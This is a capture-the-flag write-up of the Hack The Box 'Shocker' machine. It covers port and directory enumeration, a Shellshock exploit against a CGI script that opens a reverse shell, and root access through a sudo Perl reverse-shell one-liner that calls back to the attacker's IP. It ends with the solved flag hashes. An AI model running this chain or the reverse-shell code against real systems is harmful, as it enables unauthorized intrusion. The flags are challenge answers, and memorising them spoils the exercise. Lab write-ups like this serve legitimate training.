Shocker
About
Shocker, while fairly simple overall, demonstrates the severity of the renowned Shellshock exploit, which affected millions of public-facing servers.
Enumeration
Running the script portscan.sh reveals 2 attack vectors, HTTP and SSH.
┌──(m0nk3y@kali)-[~/HTB/Shocker]
└─$ sudo portscan.sh 10.129.98.30
┌──(m0nk3y@kali)-[~/HTB/Shocker]
└─$ cat PortScan\(10.129.98.30\)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Exploitation
HTTP
Running gobuster reveals only 2 directories cgi-bin and icons.
┌──(m0nk3y@kali)-[~/HTB/Shocker]
└─$ gobuster dir -u http://10.129.98.30 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -f -t 32
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.98.30
[+] Method: GET
[+] Threads: 32
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2023/10/04 21:51:40 Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin/ (Status: 403) [Size: 295]
/icons/ (Status: 403) [Size: 293]
===============================================================
2023/10/04 22:01:50 Finished
===============================================================
Based on the name of the machine, we can assume that the target might be vulnerable to a Shellshock exploit. Assuming that this is the case, I’ll need to find an attack vector to exploit the Shellshock vulnerability. Running searchsploit-prettify.py reveals that although there is no Shellshock exploit for OpenSSH, there is an exploit for Apache which requires an accessible CGI script.
┌──(m0nk3y@kali)-[~/HTB/Shocker]
└─$ searchsploit-prettify.py 'Apache Shellshock'
-------------------------------------------------------- -----------------------------------------------------
| Exploit Title | Path |
-------------------------------------------------------- -----------------------------------------------------
| Apache mod_cgi - 'Shellshock' Remote Command Injection | /usr/share/exploitdb/exploits/linux/remote/34900.py |
-------------------------------------------------------- -----------------------------------------------------
┌──(m0nk3y@kali)-[~/HTB/Shocker]
└─$ searchsploit -m /usr/share/exploitdb/exploits/linux/remote/34900.py
Exploit: Apache mod_cgi - 'Shellshock' Remote Command Injection
URL: https://www.exploit-db.com/exploits/34900
Path: /usr/share/exploitdb/exploits/linux/remote/34900.py
Codes: CVE-2014-6278, CVE-2014-6271
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/m0nk3y/HTB/Shocker/34900.py
Running gobuster to find CGI scripts inside cgi-bin directory reveals a CGI script user.sh which is accessible.
┌──(m0nk3y@kali)-[~/HTB/Shocker]
└─$ gobuster dir -u http://10.129.98.30/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -x cgi,pl,php,py,sh -t 32
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.98.30/cgi-bin
[+] Method: GET
[+] Threads: 32
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: cgi,pl,php,py,sh
[+] Timeout: 10s
===============================================================
2023/10/04 23:57:11 Starting gobuster in directory enumeration mode
===============================================================
/user.sh (Status: 200) [Size: 118]
===============================================================
2023/10/05 00:58:02 Finished
===============================================================
By executing the exploit with appropriate parameters, I’m able to gain a shell as the user asterisk.
┌──(m0nk3y@kali)-[~/HTB/Shocker]
└─$ python2 34900.py payload=reverse rhost=10.129.98.30 pages='/cgi-bin/user.sh' lhost=10.10.16.9 lport=4444
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 10.129.98.30
10.129.98.30> id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
Privilege Escalation
Checking for sudo rights for the user shelly shows that I’m able to run /usr/bin/perl as root without a password.
10.129.98.30> sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
By executing a Perl reverse shell one-liner as a super user, I’m able to gain a shell as the user root.
10.129.98.30> sudo perl -e 'use Socket;$i="10.10.16.9";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
┌──(m0nk3y@kali)-[~/HTB/Shocker]
└─$ nc -s 10.10.16.9 -nlvp 4443
listening on [10.10.16.9] 4443 ...
connect to [10.10.16.9] from (UNKNOWN) [10.129.98.30] 47718
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
Post Exploitation
With the shell acquired, I’m able to read the flags user.txt and root.txt.
# cat /home/shelly/user.txt
6d1706cfd88d978562e045997da90eb2
# cat /root/root.txt
96f5852472fd6727c8db5ebe600fdd61